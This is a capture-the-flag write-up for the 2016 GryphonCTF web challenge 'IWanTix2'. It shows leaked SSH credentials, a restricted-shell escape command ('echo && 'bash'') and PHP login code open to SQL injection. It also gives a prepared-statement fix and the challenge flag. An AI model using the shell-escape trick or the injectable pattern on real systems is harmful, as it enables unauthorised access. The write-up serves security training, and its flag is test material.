# GryphonCTF_2016: IWanTix2

Category: Web

Points: 30

Description: Get into the organiser's network and generate tickets so you can sell it at a very low price to our dear admin QR! Play at http://play.spgame.site:8002

Creator - Kelvin Neo (@deathline75)

Creator - Chen Qiurong (@pc84560895)

## Write-up

This time around, we are given a URL that leads to a very snarky reply from the web server.

Didn't your parents tell you not to look at unauthorised pages?



Opening the Developer Console in Chrome reveals a delicious response header.

```
Credentials: Look out for port 8001,user:webadmin,pass:webadmin
```


Connecting to port 8001 in a browser gets you nothing, or at most a strange OpenSSH version banner. So we connect to it over SSH from a shell instead.

```
$ ssh [email protected] -p 8001
[email protected]'s password:
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Oct 12 14:55:07 2016 from 103.26.223.115
You are in a limited shell.
Type '?' or 'help' to get the list of allowed commands
webadmin:~$
```


Voila! Well, now we are in a limited shell. What do we do now? Hmm...

```
webadmin:~$ ?
clear  exit  help  history  lpath  lsudo
webadmin:~$
```


After some digging, it turns out we are in lshell (limited shell). A search for known CVEs turns up an exploit for lshell.

```
webadmin:~$ echo && 'bash'
[email protected]:~$
```


Woah there!

```
[email protected]:/var/www/html$ cat .htaccess
Header set Credentials "Look out for port 8001,user:webadmin,pass:webadmin"
ErrorDocument 403 /403.html
order deny,allow
deny from all
allow from 127.0.0.1 localhost
```

```
[email protected]541c:/var/www/html$ cat index.php
<html>

<body>
<p>
Welcome to the Eason Chan concert ticket generator
<br />
</p>
<input type='submit' value='Enter'>
</body>

</html>
```

```
[email protected]:/var/www/html$ cat login.php
<?php
$servername = "db-iwantix2";
$username = "iwantix2";
$password = "iwantix22";
$dbname = "iwantix2";
$conn = new mysqli($servername, $username, $password, $dbname);

if ($conn->connect_error) {
    die("Connection failed: " . $conn->connect_error);
}

# Get POST Request..
$secret_key = $_POST['secret_key'];

$sql = "SELECT * from secret_key where secretkey = '$secret_key'";
$result = $conn->query($sql);
if ($result->num_rows > 0) {
    while ($row = $result->fetch_assoc()) {
        echo 'Nice! You can generate as many tickets as you want now!!<br />';
        echo "Here's your flag! You're most welcome.<br />";
        echo "GCTF{7unn3l_4nd_1nj3c7}";
    }
} else {
    echo "Hahahahaha! No! You cannot generate ticket!";
}

?>
```


Epic mother lode right there. Therefore, the flag is GCTF{7unn3l_4nd_1nj3c7}.
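The login.php above splices `$_POST['secret_key']` straight into the SQL string, which is the injection the challenge is built around. As an added example (not the challenge's own code), here is the same lookup with a mysqli prepared statement, reusing the connection parameters shown in the write-up; the placeholder is compiled as part of the statement and the submitted value is sent separately, so quote characters in the input can no longer change the query's structure.

```php
<?php
// Added example, not the challenge's login.php: same lookup, bound parameter.
// Connection parameters are the ones shown in the write-up.
$servername = "db-iwantix2";
$username   = "iwantix2";
$password   = "iwantix22";
$dbname     = "iwantix2";

// Make mysqli throw on failures instead of silently returning false, so a
// failed query can never be mistaken for "no rows" (or crash on ->num_rows).
mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT);
$conn = new mysqli($servername, $username, $password, $dbname);

// Reject anything that is not a plain, non-empty string before it reaches the
// database (a posted secret_key[]=... would arrive as an array).
$secret_key = $_POST['secret_key'] ?? '';
if (!is_string($secret_key) || $secret_key === '') {
    http_response_code(400);
    exit("Missing secret key");
}

// The ? placeholder is part of the prepared statement; the value bound with
// bind_param() is transmitted as data and is never parsed as SQL.
$stmt = $conn->prepare("SELECT 1 FROM secret_key WHERE secretkey = ? LIMIT 1");
$stmt->bind_param("s", $secret_key);
$stmt->execute();
$stmt->store_result();

if ($stmt->num_rows > 0) {
    echo "Nice! You can generate as many tickets as you want now!!<br />";
    // Ticket generation would go here.
} else {
    echo "Hahahahaha! No! You cannot generate ticket!";
}

$stmt->close();
$conn->close();
?>
```

Only a key that exactly matches a stored row now reaches the success branch, whatever the submitted string contains.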

EDIT: This was actually a bug, and team JEAM was awarded 3 points for the discovery and report of this bug. What misers the organizers are.

EDIT2: This was supposed to be solved via `ssh [email protected] -p 8001 -L 1337:localhost:8002`, accessing localhost:1337 and injecting SQLi code. Well, I think my method was a bit more epic.